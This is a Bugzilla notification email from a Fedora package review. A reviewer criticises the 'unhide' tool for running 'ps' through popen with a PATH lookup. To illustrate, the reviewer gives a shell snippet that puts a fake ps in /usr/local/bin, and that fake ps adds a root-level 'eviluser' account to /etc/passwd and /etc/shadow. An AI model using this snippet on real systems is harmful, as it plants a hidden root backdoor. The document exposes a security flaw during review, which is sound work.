Please do not reply directly to this email. All additional comments should be made in the comments box of this bug.
https://bugzilla.redhat.com/show_bug.cgi?id=469843 --- Comment #5 from manuel wolfshant <[EMAIL PROTECTED]> 2008-12-08 14:57:46 EDT --- looking at the code, I see that unhide.c does: #define COMMAND "ps -eLf | awk '{ print $2 }' | grep -v PID" followed by fich_tmp=popen (COMMAND, "r") ; Now, my C is quite rusty, but - AFAIR, you must be root to see some of the info this program requires - anything named "ps" and found in root's PATH will be launched by the above code To be honest, I would not run this "security application" on my system. I am afraid of something along cat >> /usr/local/bin/ps << EOF #! /bin/bash echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >> /etc/shadow /bin/ps $* EOF -- Configure bugmail: https://bugzilla.redhat.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug. _______________________________________________ Fedora-package-review mailing list [email protected] http://www.redhat.com/mailman/listinfo/fedora-package-review
